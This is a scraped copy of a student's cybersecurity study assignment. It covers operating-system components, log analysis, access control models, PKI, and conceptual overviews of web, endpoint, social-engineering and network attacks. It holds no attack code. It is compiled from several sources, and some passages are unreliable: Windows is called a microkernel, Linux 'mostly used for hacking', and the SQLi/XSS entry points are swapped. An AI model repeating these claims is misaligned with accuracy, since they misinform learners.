Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

Assignment Cs 1 (1) 3 (1) 4

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 25

1.

Identify components of an operating system (such as Windows and Linux) in a given scenario

Windows Operating System


Windows

Processes: A process is an executing program.. One or more threads run in the context
of the process.

Thread: is the basic unit to which the operating system allocates processor time. A
thread can execute any part of the process code, including parts currently being
executed by another thread.

Memory allocation: The task of fulfilling an allocation request consists of locating a


block of unused memory of sufficient size. Memory requests are satisfied by
allocating portions from a large pool of memory called the heap or free store. Heaps
are memory set aside for for dynamic allocation. Stacks are memory set aside as spare
space for a thread of execution. Volatile memory is memory that loses its contents
when the computer loses power. Nonvolatile memory holds data with or without
power. Dynamic memory allocation has the program allocates memory at run time.
Static allocation has memory allocated at compile time.

Windows Registry: Windows stores its configuration information in a database called


the registry. The registry contains profiles for each user of the computer and
information about system hardware, installed programs, and property settings.
Windows continually reference this information during its operation.

WMI: Windows Management Instrumentation (WMI) is a set of specifications from


Microsoft for consolidating the management of devices and applications in a network
from Windows computing systems. WMI is the Microsoft implementation of Web-
Based Enterprise Management (WBEM), which is built on the Common Information
Model (CIM), a computer industry standard for defining device and application
characteristics so that system administrators and management programs can control
devices and applications from multiple manufacturers or sources in the same way.

Handles: An object is a data structure that represents a system resource, such as a file,
thread, or graphic image. An application cannot directly access object data or the
system resource that an object represents. Instead, an application must obtain an
object handle, which it can use to examine or modify the system resource. Each
handle has an entry in an internally maintained table. These entries contain the
addresses of the resources and the means to identify the resource type.

Services: Microsoft Windows services, formerly known as NT services, enable you to


create long-running executable applications that run in their own Windows sessions.
These services can be automatically started when the computer boots, can be paused
and restarted, and do not show any user interface. These features make services ideal
for use on a server or whenever you need long-running functionality that does not
interfere with other users who are working on the same computer. You can also run
services in the security context of a specific user account that is different from the
logged-on user or the default computer account. For more information about services
and Windows sessions, see the Windows SDK documentation in the MSDN Library.
A Windows service is a computer program that operates in the background.

LINUX Operating System


Processes: An instance of a program that is being executed. Each process has a unique
PID, which is that process’s entry in the kernel’s process table.
Fork: creates a new process by duplicating the calling process. The new process is
referred to as the child process. The calling process is referred to as the parent
process.

Permissions: a system to control the ability of the users and processes to view or make
changes to the contents of the filesystem.

Symlink: is the nickname for any file that contains a reference to another file or
directory in the form of an absolute or relative path and that affects pathname
resolution.

Daemon: In multitasking computer operating systems, a daemon is a computer


program that runs as a background process, rather than being under the direct control
of an interactive user.

Linux Operating System


Linux is a free and open-source operating system created and designed by Linus Torvalds in 1991.
Linux is a derived form of Unix. It is free of cost making it available for all users. It is open-source,
means that the source code of Linux is available for all users. Users can add additional programs or
modify the existing ones so that it can perform various other functions.
 Linux uses a monolithic kernel. It runs both kernel and user services in the same address
space. It has many distributions such as Ubuntu, Linux mint, Fedora, etc.
 Linux was written in C language and assembly language. It is more machine friendly, which
means users find it difficult to interact with Linux.
 Linux has become the largest open-source software in the world. It provides high security and
is mostly used for hacking purposes.
 Some of the features of Linux include its Portability, Security, and Multitasking abilities. Plus,
Linux is open source.
Some of the drawbacks of using the Linux operating system are listed below −
 It can’t run most of the Windows programs.
 Most of the Internet service providers do not support Linux.
 Linux is difficult to learn for most of the new users. Depending on its distributions, the difficulty
level varies.
Windows Operating System
Windows is an operating system developed by Microsoft. Its first version was released in 1985
which was an extension of MS-DOS.
 Windows is not open-source. Its free version lacks some of the features that the licensed
version has.
 Windows is the most widely used operating system in PCs. It provides a GUI which is very
user-friendly. It is available in two versions, i.e., 32 bit and 64 bit. It has both client and server
versions.
 Windows uses a microkernel. Its address space is separated into kernel space and user
space. Windows is designed in such a way that people with no programming knowledge can
also use it.
 It is good for both personal and commercial use because it is very simple and easy to use.
 Windows was written in C++ and Assembly language. Windows provides less security as
compared to Linux.
 Some of the features of Windows include: Control panel, File explorer, Internet Browser, Disk
cleanup features, and a highly user friendly Interface.
Some of the drawbacks of using the Windows operating system are listed below −
 Most of the Windows features are available only in the paid/licensed version.
 It provides less security.
 System requirements
 Users have to pay software fee along with the license fee.
Differences: Linux and Windows Operating Systems
The following table highlights the major differences between the Linux and Windows operating
systems −

Parameter Linux Windows

Linux is an open-source operating system Windows is an operating system


Definition
developed for desktops developed for desktops
Developed Linus Torvalds Microsoft
by

Availability Open-source and free of cost Not an open-source and it is paid

Linux is machine-friendly. So user must Windows is simple with rich GUI options.
Ease of have some exposure to Linux commands. User doesn’t need any knowledge of
use It takes more time for users to get used to programming. It is more useful for non-
Linux technical users.

Kernel type Monolithic kernel Microkernel

Path Forward slash is used as a path Backward slash is used as a path


separator separator separator

Linux is more secure than Windows Windows is less secure compared to


Security
Linux

Case Linux is highly case-sensitive Windows is not case sensitive


sensitivity

Updates Linux updates less frequently Windows updates frequently

Linux is written in C and Assembly Windows is written in C++ and Assembly


Written in
language language

Linux is distributed under GPL(GNU Windows is distributed under Proprietary


License
General Public License) license commercial software license

Linux is more reliable than windows as it Windows is not much reliable as Linux
Reliability
is more secured

Linux uses tree structure to store files. In Windows uses directories such as C, D,
File system Linux everything is considered as a file E and more and folders are used to store
files

 Regular  Administrator
Types of  Administrative  Standard
users  Service  Child
 Guest

Speed Linux is faster than windows Windows is slower compared to Linux

Command Here, the command line is referred to as Windows also have a command prompt
line a Terminal which is very useful and
perform various tasks which is not as effective as Terminal.
Users use GUI to perform their tasks

Linux installation setup is a bit Windows is easy to setup but takes more
Installation complicated but it takes less time to time to install
install

2. Interpret operating system, application, or command line logs to identify an event

Event Viewer logs every event that occurs on your computer from the moment you first boot
it up. Logged events include those related to programs installed on the computer, system
performance, and security.

For Windows, you can use the Event Viewer utility to view and analyze the logs
from the operating system and applications such as SQL Server or IIS. The logs
use a structured data format, making them easy to search and filter. You can also
use a text editor such as Notepad++ to open log files in text format, such as IIS
Access Logs. You can learn more about Windows logging basics from this guide.

For Mac, you can use the Terminal app to read log files using the command line,
or the Console app to view and navigate the logs using a graphical interface. The
Console app shows different categories of logs, such as system reports, user
reports, and console errors. You can also use a text editor such as TextEdit to
open log files in text format. You can learn more about how to read log files on
Mac from this

For Linux, you can use the command line to read log files from various locations,
such as /var/log, /var/log/syslog, or /var/log/messages. You can use commands
such as cat, tail, grep, or less to view and filter the log files. You can also use a
text editor such as vi or nano to open log files in text format. You can learn more
about how to read log files on Linux from [this tutorial].

To identify an event from a log file, you need to look at the timestamp, the
source, the event ID, the message, and the severity level of each log entry. The
timestamp tells you when the event occurred, the source tells you which
application or service generated the event, the event ID tells you what type of
event it is, the message tells you what happened or what caused the event, and
the severity level tells you how critical or important the event is. For example, an
error level event indicates a problem that needs attention, while an information
level event indicates a normal operation.

3. Describe management concepts:


A. Asset Management
What is Asset Management?
Asset management describes managing money on clients’ behalf. The financial institutions
managing the money are called asset managers, and they develop and execute investment
strategies that create value for their clients. Broadly, this process involves “putting money to
work” by buying, holding, and selling financial assets with the potential to achieve a client’s
investment goals. Examples of financial assets include stocks, bonds, commodities, shares in
private funds, and more.

Most importantly, asset management firms are “fiduciaries.” This means that, unlike other
parts of the financial services industry, asset management clients provide full trading
authority — also known as “discretion” — of their funds to their asset manager. In turn,
asset managers are legally required to act in their client’s best interests.

The top five asset management firms globally are:

1. Black Rock (USA)


2. Vanguard Group (USA)
3. Fidelity Investments (USA)
4. State Street Global Advisors (USA)
5. Morgan Stanley (USA

Generally: Asset management: This is the process of optimizing the value, use, and
maintenance of physical and intangible assets, such as equipment, buildings, costs, risks,
and benefits of owning and operating assets throughout their life cycle. Asset
management can help organizations achieve their strategic goals, reduce operational
expenses, enhance asset performance, and comply with regulations 12

Key Highlights

 Asset management firms manage and invest funds for large institutional clients, like global
corporations, sovereign wealth funds, and not-for-profit organizations.
 Wealth management firms offer financial and investment advisory services to high-net-
worth individuals and families.
 Large national banks will typically offer both lines of business, and the client base is what
segments the fiduciary part of the business.

B. Configuration management
Configuration Management is the process of maintaining systems, such as computer hardware and
software, in a desired state. Configuration Management (CM) is also a method of ensuring that systems
perform in a manner consistent with expectations over time.
Configuration management: This is the process of establishing and maintaining
consistency of a product’s performance, functional, and physical attributes with its
requirements, design, and operational information throughout its life. Configuration
management verifies that a product performs as intended and is identified and
documented in sufficient detail to support its projected life cycle. Configuration
management helps to manage changes to the product, ensure quality and reliability,
and avoid errors or defects

Definition of configuration management:


Configuration management means managing work results that belong
together, also known as configurations

The five CM functions are:

Configuration Management Planning and Management.

Configuration Identification.

Configuration Change Management.

Configuration Status Accounting.

Configuration Verification and Audit.

C. Path management

A critical path in project management is the longest sequence of activities that must be finished on time
in order for the entire project to be complete. Any delays in critical tasks will delay the rest of the
project

Path management: This is the process of planning, scheduling, monitoring, and


controlling the activities and resources that are required to complete a project or
achieve a goal. Path management involves identifying the critical path of a project,
which is the sequence of tasks that determines the minimum time needed to finish the
project. Path management also involves managing the dependencies, constraints, risks,
and uncertainties that may affect the project’s progress and outcome

D. Mobile device management


Mobile device management: This is the process of distributing and
applying updates to software on mobile devices, such as smart phones,
tablets, laptops, or wear able. Mobile device management also involves
securing, monitoring, and controlling the access and usage of mobile
devices within an organization. Mobile device management can help
organizations enhance productivity, efficiency, and collaboration among
employees who use mobile devices for work purposes
E. Vulnerability management

Vulnerability management is a continuous, proactive, and often automated process that keeps your
computer systems, networks, and enterprise applications safe from cyber attacks and data breaches.
As such, it is an important part of an overall security program. By identifying, assessing, and
addressing potential security weaknesses, organizations can help prevent attacks and minimize
damage if one does occur.

The goal of vulnerability management is to reduce the organization's overall risk exposure by
mitigating as many vulnerabilities as possible. This can be a challenging task, given the number of
potential vulnerabilities and the limited resources available for remediation. Vulnerability
management should be a continuous process to keep up with new and emerging threats and
changing environments.

 Vulnerability management: This is the process of discovering, prioritizing, and resolving


security vulnerabilities in an organization’s IT infrastructure and software. Security
vulnerabilities are any flaws or weaknesses that hackers can exploit to launch
cyberattacks or gain unauthorized access to systems or data. Vulnerability management
involves scanning systems and networks for vulnerabilities, assessing their severity and
impact, applying patches or mitigations to fix them, and monitoring their status.

4. Identify protected data in a network in PII, PSI, PHI & intellectual property

Protected data is data that contains sensitive or confidential information that must be
safeguarded from unauthorized access, use, or disclosure. Protected data can include
personal, financial, health, or intellectual property information that belongs to
individuals or organizations. Depending on the type and context of the data, different
laws and regulations may apply to protect the data and ensure its privacy and security.
Protected data in a network are:
1.Personally Identifiable Information
What is Personally Identifiable Information (PII)?
Personally Identifiable Information (PII) is any information that can be used to identify, locate, or
contact a specific individual. PII can include both sensitive and non-sensitive data. PII is regulated by
various privacy laws and standards worldwide, such as the Privacy Act in the US and the General
Data Protection Regulation (GDPR) in the European Union.

Common PII Examples

 Full name
 Social security number
 Passport number
 Driver’s license number
 Email address and phone number

2.Protected Sensitive Information

 PSI: Protected Sensitive Information. This is data that is not classified as PII, but still
requires protection from unauthorized access or disclosure due to its sensitivity or
confidentiality. Examples of PSI include employee performance reviews, salary
information, trade secrets, business plans, customer lists, etc. PSI may be subject to
contractual obligations, non-disclosure agreements, or internal policies that restrict its
access and use.

3.Protected Health Information


What is Protected Health Information (PHI)?
Protected Health Information (PHI) refers to any information related to an individual’s health status,
healthcare provision, or payment for healthcare services. This data is typically collected, stored, and
transmitted by healthcare providers and insurance companies. The Health Insurance Portability and
Accountability Act (HIPAA) sets the guidelines for the proper handling of PHI in the United States.

PHI: Protected Health Information. This is data that relates to the past, present, or future
physical or mental health or condition of an individual, the provision of health care to an
individual, or the payment for the provision of health care to an individual. Examples of
PHI include medical records, diagnoses, prescriptions, test results, insurance information,
etc

Common PHI Examples

 Medical records and patient charts


 Billing information
 Health insurance policy numbers
 Test results and diagnoses
 Prescriptions

Intellectual property: This is data that represents the creations of the mind, such
as inventions, artistic works, designs, symbols, names, images, etc. Examples of
intellectual property include patents, trademarks, copyrights, trade secrets, etc.
Intellectual property is protected by various laws and treaties that grant exclusive
rights to the owners or creators of the data.

5 Compare and contrast access control models


A. Discretionary access control

Discretionary access control (DAC) is a type of security access control that grants or restricts object access via
an access policy determined by an object’s owner group and/or subjects. DAC mechanism controls are defined
by user identification with supplied credentials during authentication, such as username and password. DACs
are discretionary because the subject (owner) can transfer authenticated objects or information access to other
users. In other words, the owner determines object access privileges.

In contrast to MAC, discretionary access control models describe a system in which any user
granted access permissions by an administrator can edit and share those permissions with other
members of an organization. This means that once the end user has access to a location or a digital
system, they’re able to grant the same privileges to any other person at their own personal
discretion.

B. Mandatory access control

Mandatory access control is the strictest configuration organizations can deploy in which
all access decisions are made by one individual with the authority to confirm or deny permissions.
This model is commonly used by organizations with high-level security needs, like government
agencies and financial institutions, as access to confidential areas and data must be highly
controlled and traceable.

Mandatory access control vs. discretionary access control


models
In terms of discretionary access control vs. mandatory access control, these two models differ
greatly. MAC models rely heavily on admin configuring access parameters based on predetermined
rules and organizational roles, providing more security though often proving time-consuming to
implement.

DAC models instead provide users with some individual control over their data, with staff able to
grant permissions at their own discretion. This makes DAC systems incredibly flexible and scalable.
However, as credentials can be shared freely amongst staff, DAC models are known to present
some exploitable security risks.

C .Nondiscretionary access control

An access control policy that is uniformly enforced across all subjects and
objects within the boundary of an information system. A subject that has been
granted access to information is constrained from doing any of the following: (i)
passing the information to unauthorized subjects or objects; (ii) granting its
privileges to other subjects; (iii) changing one or more security attributes on
subjects, objects, the information system, or system components; (iv) choosing
the security attributes to be associated with newly-created or modified objects;
or (v) changing the rules governing access control. Organization-defined subjects
may explicitly be granted organization-defined privileges (i.e., they are trusted
subjects) such that they are not limited by some or all of the above constraints.

In general, all access control policies other than DAC are grouped in the category of non-discretionary access
control (NDAC).

The following are excerpts from NIST IR


 “Mandatory access control (MAC) policy means that access control policy decisions are made by a central
authority, not by the individual owner of an object, and the owner cannot change access rights.” MAC is
just one of the many forms of NDAC, so the central authority is not the critical criteria to distinguish DAC
from NDAC.
 “Although RBAC is technically a form of non-discretionary access control, recent computer security texts
often list RBAC as one of the three primary access control policies (the others are DAC and MAC).”
 “Temporal constraints are formal statements of access policies that involve time-based restrictions on
access to resources; they are required in several application scenarios. Popular access control policies related
to temporal constraints are the history-based access control policies.” The Brewer and Nash model
(Chinese Wall) is history-based.

D. Authentication, authorization, accounting

AAA stands for authentication, authorization, and accounting. AAA is a


framework for intelligently controlling access to computer resources, enforcing
policies, auditing usage, and providing the information necessary to bill for
services.

n this article, we'll cover the Authentication,


Authorization, and Accounting
(AAA) framework for cybersecurity, the meaning
of each AAA component, and the benefits of using
it for granular access control. You'll learn about
different AAA protocols and how they relate to
Identity and Access Management (IAM). By the
end of this article, you'll fully understand AAA
networking and how the model assists with
network security and monitoring.

What is Authentication, Authorization, and Accounting


(AAA)?
Authentication, Authorization, and Accounting (AAA) is a
three-process framework used to manage user access, enforce
user policies and privileges, and measure the consumption of
network resources.
The AAA system works in three chronological and dependent steps, where one must
take place before the next can begin. These AAA protocols are typically run on a
server that performs all three functions automatically. This enables IT management
teams to easily maintain network security and ensure that users have the resource
access they need to perform their jobs.

Authentication

Authentication is the process of identifying a user and granting them access to the
network. Most of the time, this is done through traditional username and password
credentials. However, users could also use passwordless authentication methods,
including biometrics like eye scans or fingerprints, and hardware such as hardware
tokens or smart cards.

The server evaluates the credential data submitted by the user compared to the
ones stored in the network's database. Active Directory is used as the database for
many enterprises to store and analyze those credentials.

Authorization

After authentication, the authorization process enforces the network policies,


granular access control, and user privileges. The cybersecurity AAA protocol
determines which specific network resources the user has permission to access,
such as a particular application, database, or online service. It also establishes the
tasks and activities that users can perform within those authorized resources.
For example, after the system grants access to the network, a user who works in
sales may only be able to use the customer relationship management (CRM)
software and not the human resources or enterprise resource planning systems.
Additionally, within the CRM, they might only be allowed to view and edit data and
not manage other users. It's the authorization process that would enforce all of these
network rules.

Accounting

Accounting, the final process in the framework, is all about measuring what's
happening within the network. As part of the protocol, it will collect and log data on
user sessions, such as length of time, type of session, and resource usage. The
value here is that it offers a clear audit trail for compliance and business purposes.

Accounting helps in both security and operational evaluations. For instance, network
administrators can look at user access privileges to specific resources to see about
any changes. They could also adjust capacity based on the resources most
frequently used and common activity trends.

E.Rule-based access control

Rule-based access control is used to manage access to locations, databases and


devices according to a set of predetermined rules and permissions that do not
account for the individual’s role within the organization. In other words, if the user
does not meet a set of predefined access criteria, they will be locked out of the
access control network regardless of their level of security clearance.
Rule-based access control (RBAC) and role-based access control (RBAC) are two
different approaches to managing access control in computer systems. Here is a
comparison and contrast between the two:

1. Definition:
- Rule-Based Access Control: RBAC is an access control model where access
decisions are based on predefined rules or policies. Each rule specifies a condition
or set of conditions that must be met for access to be granted.
- Role-Based Access Control: RBAC is an access control model where access
decisions are based on the roles assigned to users. Users are assigned specific
roles, and access permissions are associated with these roles.

2. Granularity:
- Rule-Based Access Control: RBAC provides a fine-grained level of access control
as access decisions are made based on specific conditions defined in the rules. This
allows for more precise control over access permissions.
- Role-Based Access Control: RBAC provides a coarse-grained level of access
control as access decisions are made based on the roles assigned to users. Users
with the same role have the same access permissions, which may not be as precise
as rule-based access control.

3. Flexibility:
- Rule-Based Access Control: RBAC offers more flexibility as access control
decisions can be tailored to specific conditions defined in the rules. This allows for
dynamic changes in access permissions based on changing conditions.
- Role-Based Access Control: RBAC offers less flexibility as access control decisions
are tied to predefined roles. Changes in access permissions require modifying the
role assignments, which may not be as dynamic or granular as rule-based access
control.

4. Complexity:
- Rule-Based Access Control: RBAC can be more complex to implement and
manage due to the need to define and maintain a large number of rules. It requires
careful consideration of all possible conditions and their corresponding access
decisions.
- Role-Based Access Control: RBAC is generally simpler to implement and manage
as it relies on assigning roles to users and associating access permissions with these
roles. It provides a more structured and organized approach to access control.

In summary, rule-based access control offers fine-grained control and flexibility but
can be more complex, while role-based access control provides a simpler and more
structured approach but offers less granularity and flexibility. The choice between the
two depends on the specific requirements and complexity of the access control
needs in a given system.
F. Time-based access control

 A Time-Based Access−List (ACL) is a set of rules used to filter traffic passing


through a router or switch based on date and time parameters. It is an extended
version of an Access Control List (ACL), which normally filters incoming and
outgoing traffic only based on source IP address, destination IP address and
port numbers.
 With a time−based ACL, you can refine this filtering based on specific dates
and times. In other words, it allows you to configure the router or switch so that
traffic from specific sources is only allowed at certain times.

G. Role-based access control

Role-based access control is an operational configuration for physical and cyber


entry point management designed to grant access permissions based only on the
role of the user within an organization. Simply put, levels of access are determined
by the user’s job title rather than other predefined rules such as time, frequency of
use or other similarly measurable variables.
6. Describe in details the impact of certificates on security (includes PKI, public/private crossing
the network, asymmetric/ symmetric).

7. PKI – Public key infrastructure is a set of roles, policies, hardware, software


and procedures to create, manage, distribute, store, use and revoke digital
certificates to manage public-key encryption. This is used to facilitate secure
electronic transfers of information of network activities. PKI binds public keys
with the identities of people, applications, and organizations. This “binding” is
maintained by the issuance and management of digital certificates by a
certificate authority.
8. Public/Private Crossing The network – A key pair is a set of two keys that work
in combination with each other as a team. Key pairs consist of one public and
one private key. Public keys are shared with everyone, the private key is never
shared. The private key is the only key that can decrypt data encrypted by the
public key.
9. Asymmetric/Symmetric – Asymmetric encryption uses the above public/private
key pairing system. The private key is the only key that can decrypt data
encrypted by the public key and vise versa. Symmetric encryption is different
where the same key is used on both sides conversation. The symmetric key is
used to both encrypt and decrypt on both sides.

111

PKI is a framework that enables the creation, distribution, and management of


certificates and public keys. PKI consists of several components, such as:

 Certificate authorities (CAs): These are entities that issue and revoke certificates. CAs can
be public or private, depending on who they serve and trust. For example, public CAs
are trusted by web browsers and operating systems to issue certificates for websites,
while private CAs are used by organizations to issue certificates for their internal
networks or applications.

 Registration authorities (RAs): These are entities that assist CAs in validating the identity
and credentials of certificate applicants. RAs can be part of the CA or separate entities
that act as intermediaries between the CA and the applicants.
Certificates play a crucial role in ensuring security in various aspects of digital communication
and information exchange. They are primarily used in Public Key Infrastructure (PKI) systems, which
involve the use of public and private keys for encryption and decryption.

One of the key impacts of certificates is their ability to establish trust between parties involved in a
communication. Certificates are issued by trusted third-party entities known as Certificate Authorities
(CAs). These CAs validate the identity of individuals, organizations, or devices requesting a certificate,
ensuring that they are who they claim to be. This process helps in preventing impersonation or fraud.

Certificates are particularly important in securing data while crossing a network. When data is
transmitted over a network, it is vulnerable to interception and tampering. By using certificates,
encryption algorithms, and secure protocols, such as Transport Layer Security (TLS), data can be
encrypted before transmission. Certificates are used to authenticate the server and client involved in the
communication, ensuring that the data is securely transmitted between trusted entities.

Asymmetric and symmetric encryption algorithms are commonly used in conjunction with certificates to
ensure security. Asymmetric encryption involves the use of a pair of keys: a public key for encryption
and a private key for decryption. Certificates contain the public key of an entity, which can be freely
shared with others. This allows secure communication where data encrypted with the public key can
only be decrypted using the corresponding private key, which is kept secret by the entity.

Symmetric encryption, on the other hand, uses a single key for both encryption and decryption. While
symmetric encryption is faster than asymmetric encryption, securely exchanging the symmetric key
between parties becomes a challenge. Certificates come into play here by facilitating the secure
exchange of symmetric keys. The symmetric key can be encrypted using the recipient's public key and
securely transmitted alongside the encrypted data. The recipient can then use their private key to
decrypt the symmetric key and use it for decrypting the data.

In summary, certificates have a profound impact on security in various aspects of digital communication.
They enable trust between parties involved in a communication, secure the transmission of data over
networks, prevent unauthorized access, and ensure the authenticity and integrity of the parties
involved. PKI systems, with the help of certificates, form the backbone of secure communication in
today's digital world

10. Discuss in details web application attacks, such as SQL injection, command injections, and
cross-site scripting

Web application attacks are malicious activities that target web applications by
exploiting vulnerabilities in their design or implementation. These attacks can result in
unauthorized access, data theft, or other harmful consequences. Some of the common
types of web application attacks are:
SQL injection attack
SQL injection is a common and prevalent method of attack that targets victims' databases through web applications.
It enables cyberattackers to access, modify, or delete data, and thus manipulate the organization's databases. For any
organization, data is one of the most critical and valuable assets, and an attack on its database can wreak havoc on
the entire business.

Data can include customer records, privileged or personal information, business-critical data, confidential data, or
financial records of an organization.

According to MITRE ATT&CK, cyberattackers often exploit public-facing applications to gain the initial foothold
within an organization's network. These applications are generally websites but can also include databases like SQL.
What Is Command Injection?

Command injection is a cyber attack wherein an attacker takes control of the host operating system by
injecting code into a vulnerable application through a command. This code is executed regardless of any
security mechanism and can be used to steal data, crash systems, damage databases, and even install
malware that can be used later.

Attackers can access a target system through command injection by using various methods and
techniques. The attacker runs arbitrary commands in the system shell of the web server that can
compromise all relevant data.

Next let's look at how it differs from another widespread attack: code injection.

Cross-site scripting
Cross-site scripting (XSS) attack is a popular attack technique used by hackers to target web applications. Here, the
attackers inject malicious client-side scripts into a user's browsers or web pages, allowing them to download
malware into the target user's system, impersonate the target, and carry out data exfiltration, session hijacking,
changes in user settings, and more.

According to MITRE ATT&CK, cross-site scripting is an example of a drive-by compromise technique used by
adversaries to gain initial access within the network. The technique aims to exploit website vulnerabilities through
malicious client side scripts or code. This provides them with access to systems on the internal network and also
allows them to use compromised websites to direct the victims to malicious applications meant to steal and acquire
Application Access Tokens (used to make authorized and legitimate API requests on behalf of users/services to
access resources in cloud or SaaS applications).
There are three types of XSS attacks:

- Stored XSS: The malicious script is permanently stored on the target server and served to users who
access the affected page.
- Reflected XSS: The malicious script is embedded in a URL or input field, and the server reflects it back in
the response.

- DOM-based XSS: The malicious script manipulates the Document Object Model (DOM) of a web page,
leading to script execution.

Differences between SQL injection and XSS attack


Even though both SQL injection and XSS attack are common web hacking techniques, there are a few key
differences between the two.

SQL injection attack Cross-site scripting attack

Attack An attack technique where attackers An attack technique where attackers execute
definition target data-driven applications and malicious code in the victim users browsers
compromise user/organization databases which they can control.
by performing certain actions.

Entry The initial access in SQL attack is The initial access in XSS attack is achieved
point achieved through drive-by compromise through exploiting public-facing application
technique. technique.

Attack The attacker injects malicious SQL The attacker injects malicious client-side
technique queries into web form input field. scripts into webpages/websites.

Impact Upon successful execution, the attacker Upon successful execution, the attacker can
can add, delete, or modify the existing perform session hijacking, credential theft,
database and bypass the security data exfiltration, impersonate victim user,
controls. account hijacking, etc.

Attack The most common language used in the The most common language used in the
language attack is SQL. attack is JavaScript.

11. Describe social engineering attacks


Social engineering attacks are a type of cyber attack that manipulates human psychology to deceive
individuals into performing certain actions or divulging sensitive information. These attacks exploit the
natural tendency of people to trust and help others, making them vulnerable to manipulation.

Common social engineering attacks include:

1. Phishing: Attackers send fraudulent emails or messages that appear to be from a legitimate source,
such as a bank or service provider. These messages often prompt recipients to click on malicious links,
provide login credentials, or disclose personal information.

2. Pre texting: Attackers create a false scenario or pretext to trick individuals into revealing sensitive
information. They may impersonate someone in a position of authority, such as an IT technician or a
company executive, and use this false identity to gain trust and access sensitive data.

3. Baiting: Attackers entice individuals with an appealing offer, such as a free download or a prize, to lure
them into taking an action that compromises their security. For example, they may leave infected USB
drives in public places, hoping that someone will plug them into their computer and unknowingly install
malware.

4. Tailgating: In this attack, the attacker gains unauthorized physical access to a restricted area by
following closely behind an authorized person. The attacker exploits the natural tendency to hold doors
open for others or avoid confrontation.

5. Impersonation: Attackers pretend to be someone else, such as a coworker, a customer, or a service


provider, to gain trust and convince individuals to share sensitive information or perform certain actions.

To protect against social engineering attacks, individuals should be cautious when sharing personal
information online or over the phone. They should verify the legitimacy of requests before providing any
sensitive data and be wary of unsolicited emails or messages. Organizations can educate their
employees about social engineering techniques and implement security protocols, such as two-factor
authentication and strict access controls, to mitigate the risk of these attacks.
12. Explain in details endpoint-based attacks, such as buffer overflows, command and control
(C2), malware, and ransomware.

Endpoint-based attacks refer to cyber attacks that target individual devices or endpoints, such as
computers, laptops, smartphones, or IoT devices. These attacks exploit vulnerabilities in the software or
hardware of these devices to gain unauthorized access, steal information, or disrupt operations. Some
common types of endpoint-based attacks include buffer overflows, command and control (C2) attacks,
malware, and ransomware

What is a Buffer Overflow Attack


Attackers exploit buffer overflow issues by overwriting the memory of an
application. This changes the execution path of the program, triggering a
response that damages files or exposes private information. For example, an
attacker may introduce extra code, sending new instructions to the application
to gain access to IT systems.

If attackers know the memory layout of a program, they can intentionally feed
input that the buffer cannot store, and overwrite areas that hold executable
code, replacing it with their own code. For example, an attacker can overwrite a
pointer (an object that points to another area in memory) and point it to an
exploit payload, to gain control over the program.

Types of Buffer Overflow Attacks


Stack-based buffer overflows are more common, and leverage stack
memory that only exists during the execution time of a function.

Heap-based attacks are harder to carry out and involve flooding the memory
space allocated for a program beyond memory used for current runtime
operations.

Command and Control (C2) Attacks

Command and Control (C2) Attacks: In a C2 attack, an attacker establishes a connection between a
compromised endpoint and a remote command and control server. This allows the attacker to remotely
control the compromised endpoint and execute various malicious activities, such as stealing sensitive
data, launching further attacks, or using the compromised endpoint as a launching pad for attacks on
other systems

Malware: Malware is a broad term that encompasses various types of malicious software designed to
harm or gain unauthorized access to endpoints. This includes viruses, worms, Trojans, spyware, and
adware. Malware can be delivered through various means, including email attachments, malicious
websites, or infected software downloads. Once installed on an endpoint, malware can perform a range
of malicious activities, such as stealing sensitive information, controlling the device remotely, or
disrupting normal operations.

4. Ransomware: Ransomware is a type of malware that encrypts files on an endpoint or an entire


network, rendering them inaccessible to the user. The attacker then demands a ransom payment in
exchange for providing the decryption key. Ransomware attacks often exploit vulnerabilities in software
or use social engineering techniques to trick users into downloading or executing the malicious payload.
Ransomware attacks can have severe consequences, causing data loss, financial losses, and operational
disruptions.

To protect against endpoint-based attacks, individuals and organizations should implement several
security measures:

1. Keep software and operating systems up to date with the latest patches and security updates to
address known vulnerabilities.

2. Use robust antivirus and anti-malware software to detect and block malicious programs.

3. Employ intrusion detection and prevention systems (IDS/IPS) to monitor and block suspicious network
traffic.

10. Describe network attacks, such as protocol-based, denial of service, distributed denial of service,
and man-in-the-middle

What Is a Network Attack?


A network attack is an attempt to gain unauthorized access to an organization’s network, with the
objective of stealing data or perform other malicious activity. There are two main types of
network attacks:

 Passive: Attackers gain access to a network and can monitor or steal sensitive information,
but without making any change to the data, leaving it intact.

 Active: Attackers not only gain unauthorized access but also modify data, either deleting,
encrypting or otherwise harming it.

What are the Common Types of Network Attacks?


1. Protocol-based Attacks: Protocol-based attacks exploit weaknesses or flaws in network protocols
to gain unauthorized access or disrupt network communication. For example, attackers may
exploit vulnerabilities in the Domain Name System (DNS) protocol to redirect users to malicious
websites or intercept their communications.

2. Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network,

making it inaccessible to its intended users. DoS attacks accomplish this by flooding the target

with traffic, or sending it information that triggers a crash. In both instances, the DoS attack

deprives legitimate users (i.e. employees, members, or account holders) of the service or

resource they expected.

Victims of DoS attacks often target web servers of high-profile organizations such as banking,

commerce, and media companies, or government and trade organizations. Though DoS attacks

do not typically result in the theft or loss of significant information or other assets, they can cost

the victim a great deal of time and money to handle.

There are two general methods of DoS attacks: flooding services or crashing services. Flood

attacks occur when the system receives too much traffic for the server to buffer, causing them to

slow down and eventually stop.

3.Distributed Denial of Service (DDoS) attacks


Attackers build botnets, large fleets of compromised devices, and use them to direct false
traffic at your network or servers. DDoS can occur at the network level, for example by
sending huge volumes of SYN/ACC packets which can overwhelm a server, or at the
application level, for example by performing complex SQL queries that bring a database
to its knees.
4.Man in the middle attacks
A man in the middle attack involves attackers intercepting traffic, either between your
network and external sites or within your network. If communication protocols are not
secured or attackers find a way to circumvent that security, they can steal data that is
being transmitted, obtain user credentials and hijack their sessions

To protect against network attacks, individuals and organizations should implement several security
measures:

1. Use encryption protocols, such as Transport Layer Security (TLS) or Virtual Private Networks (VPNs), to
secure data transmitted over networks and prevent eavesdropping or tampering.

2. Implement firewalls and intrusion detection systems (IDS) to monitor and block suspicious network
traffic.

3. Regularly update network devices, such as routers and switches, with the latest firmware and security
patches to address known vulnerabilities.

4. Use strong and unique passwords for network devices and regularly change them to prevent
unauthorized access.

11. Describe Economics of cybersecurity

Cybersecurity economics can be defined as a field of research that utilizes a socio-technical perspective
to investigate economic aspects of cybersecurity such as budgeting, information asymmetry,
governance, and types of goods and services, to provide sustainable policy recommendations,
regulatory options, and practical solutions that can substantially improve the cybersecurity posture of
